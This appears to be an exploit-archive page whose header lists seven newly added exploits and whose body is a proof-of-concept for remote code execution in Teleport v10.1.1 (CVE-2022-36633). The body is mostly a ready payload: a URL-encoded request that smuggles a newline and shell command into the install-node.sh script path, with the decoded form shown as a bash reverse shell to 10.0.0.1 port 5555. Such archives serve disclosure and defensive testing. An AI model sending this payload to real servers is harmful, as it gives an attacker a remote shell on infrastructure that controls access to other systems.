c5397147d9
7 changes to exploits/shellcodes Teleport v10.1.1 - Remote Code Execution (RCE) TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) Aero CMS v0.0.1 - SQLi Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
19 lines
No EOL
615 B
Text
19 lines
No EOL
615 B
Text
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
|
|
# Date: 08/01/2022
|
|
# Exploit Author: Brandon Roach & Brian Landrum
|
|
# Vendor Homepage: https://goteleport.com
|
|
# Software Link: https://github.com/gravitational/teleport
|
|
# Version: < 10.1.2
|
|
# Tested on: Linux
|
|
# CVE: CVE-2022-36633
|
|
|
|
Proof of Concept (payload):
|
|
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
|
|
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
|
|
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
|
|
method=3Diam
|
|
|
|
|
|
Decoded payload:
|
|
"
|
|
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 # |